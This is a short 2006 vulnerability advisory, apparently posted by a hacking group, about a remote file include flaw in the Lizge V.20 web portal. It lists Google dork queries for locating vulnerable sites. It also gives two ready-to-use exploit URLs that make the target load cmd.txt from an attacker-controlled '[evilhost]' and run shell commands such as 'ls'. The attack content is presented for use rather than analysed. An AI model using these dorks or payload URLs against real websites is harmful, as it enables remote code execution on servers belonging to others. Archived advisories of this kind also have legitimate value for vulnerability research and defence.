Lizge V.20 Web Portal File Include Vulnerability

2006-08-16T00:00:00
ID SECURITYVULNS:DOC:13907
Type securityvulns
Reporter Securityvulns
Modified 2006-08-16T00:00:00

Description

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

Title : Lizge V.20 Web Portal File Include Vulnerability


Author: Crackers_Child

cont@ct: crackers_child@sibersavascilar.com


Affected software description :

Application : Lizge V.20 Web Portal URL : http://www.lizge.com


dork :allinurl:"index.php?lizge= :allinurl:"index.php?bade=


Usage:

http://[target]/[lizge_path]//index.php?lizge=http://[evilhost]/cmd.txt?&cmd=ls

http://[target]/[lizges_path]//index.php?bade=http://[evilhost]/cmd.txt?&cmd=ls


greets:

X_ALPEREN_X,Root_MOr And All Other Friends


--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------